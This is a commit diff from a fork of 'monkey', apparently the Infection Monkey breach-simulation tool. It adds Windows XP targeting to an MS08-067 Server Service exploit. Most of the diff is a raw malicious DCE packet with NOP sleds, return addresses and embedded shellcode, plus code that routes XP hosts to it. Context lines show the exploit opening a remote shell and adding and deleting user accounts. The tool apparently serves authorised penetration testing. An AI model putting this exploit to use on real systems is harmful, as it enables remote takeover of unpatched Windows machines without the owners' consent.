forked from p15670423/monkey
Merge pull request #809 from VakarisZ/ms08-067
Added windows XP support for win_ms08_067
This commit is contained in:
commit
7107e963fb
|
@ -50,6 +50,23 @@ OBFUSCATED_SHELLCODE = ("\xa9\xb6\x4a\x39\x56\x60\xb5\xba\xf6\xb2\xc0\x19\xc1\x6
|
|||
|
||||
SHELLCODE = clarify(OBFUSCATED_SHELLCODE)
|
||||
|
||||
XP_PACKET = ("\xde\xa4\x98\xc5\x08\x00\x00\x00\x00\x00\x00\x00\x08\x00\x00\x00\x41\x00\x42\x00\x43"
|
||||
"\x00\x44\x00\x45\x00\x46\x00\x47\x00\x00\x00\x36\x01\x00\x00\x00\x00\x00\x00\x36\x01"
|
||||
"\x00\x00\x5c\x00\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x41\x42\x43\x44\x45\x46\x47"
|
||||
"\x48\x49\x4a\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x41\x42\x43\x44\x45\x46\x47\x48"
|
||||
"\x49\x4a\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x41\x42\x43\x44\x45\x46\x47\x48\x49"
|
||||
"\x4a\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a"
|
||||
"\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x90"
|
||||
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
|
||||
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
|
||||
"\x90\x90\x90\x90\x90\x90\x90" + SHELLCODE + "\x5c\x00\x2e\x00\x2e\x00\x5c\x00\x2e\x00"
|
||||
"\x2e\x00\x5c\x00\x41\x00\x42\x00\x43\x00\x44\x00\x45\x00\x46\x00\x47\x00\x08\x04\x02"
|
||||
"\x00\xc2\x17\x89\x6f\x41\x41\x41\x41\x07\xf8\x88\x6f\x41\x41\x41\x41\x41\x41\x41\x41"
|
||||
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
|
||||
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x90\x90\x90\x90\x90\x90\x90\x90"
|
||||
"\xeb\x62\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x00\x00\xe8\x03\x00\x00\x02\x00\x00"
|
||||
"\x00\x00\x00\x00\x00\x02\x00\x00\x00\x5c\x00\x00\x00\x01\x10\x00\x00\x00\x00\x00\x00")
|
||||
|
||||
# Payload for Windows 2000 target
|
||||
PAYLOAD_2000 = '\x41\x00\x5c\x00\x2e\x00\x2e\x00\x5c\x00\x2e\x00\x2e\x00\x5c\x00'
|
||||
PAYLOAD_2000 += '\x41\x41\x41\x41\x41\x41\x41\x41'
|
||||
|
@ -82,6 +99,7 @@ PAYLOAD_2003 += '\xba\x77\xf9\x75\xbd\x77\x00\x00'
|
|||
class WindowsVersion(IntEnum):
|
||||
Windows2000 = 1
|
||||
Windows2003_SP2 = 2
|
||||
WindowsXP = 3
|
||||
|
||||
|
||||
class SRVSVC_Exploit(object):
|
||||
|
@ -91,6 +109,7 @@ class SRVSVC_Exploit(object):
|
|||
self._port = port
|
||||
self._target = target_addr
|
||||
self._payload = PAYLOAD_2000 if WindowsVersion.Windows2000 == os_version else PAYLOAD_2003
|
||||
self.os_version = os_version
|
||||
|
||||
def get_telnet_port(self):
|
||||
"""get_telnet_port()
|
||||
|
@ -129,6 +148,8 @@ class SRVSVC_Exploit(object):
|
|||
return sock
|
||||
|
||||
def _build_dce_packet(self):
|
||||
if self.os_version == WindowsVersion.WindowsXP:
|
||||
return XP_PACKET
|
||||
# Constructing Malicious Packet
|
||||
dce_packet = '\x01\x00\x00\x00'
|
||||
dce_packet += '\xd6\x00\x00\x00\x00\x00\x00\x00\xd6\x00\x00\x00'
|
||||
|
@ -157,7 +178,8 @@ class Ms08_067_Exploiter(HostExploiter):
|
|||
_TARGET_OS_TYPE = ['windows']
|
||||
_EXPLOITED_SERVICE = 'Microsoft Server Service'
|
||||
_windows_versions = {'Windows Server 2003 3790 Service Pack 2': WindowsVersion.Windows2003_SP2,
|
||||
'Windows Server 2003 R2 3790 Service Pack 2': WindowsVersion.Windows2003_SP2}
|
||||
'Windows Server 2003 R2 3790 Service Pack 2': WindowsVersion.Windows2003_SP2,
|
||||
'Windows 5.1': WindowsVersion.WindowsXP}
|
||||
|
||||
def __init__(self, host):
|
||||
super(Ms08_067_Exploiter, self).__init__(host)
|
||||
|
@ -231,7 +253,7 @@ class Ms08_067_Exploiter(HostExploiter):
|
|||
break
|
||||
|
||||
if not remote_full_path:
|
||||
return False
|
||||
return True
|
||||
|
||||
# execute the remote dropper in case the path isn't final
|
||||
if remote_full_path.lower() != self._config.dropper_target_path_win_32.lower():
|
||||
|
@ -251,7 +273,7 @@ class Ms08_067_Exploiter(HostExploiter):
|
|||
sock.send(("net user %s /delete\r\n" % (self._config.user_to_add,)).encode())
|
||||
except Exception as exc:
|
||||
LOG.debug("Error in post-debug phase while exploiting victim %r: (%s)", self.host, exc)
|
||||
return False
|
||||
return True
|
||||
finally:
|
||||
try:
|
||||
sock.close()
|
||||
|
|
Loading…
Reference in New Issue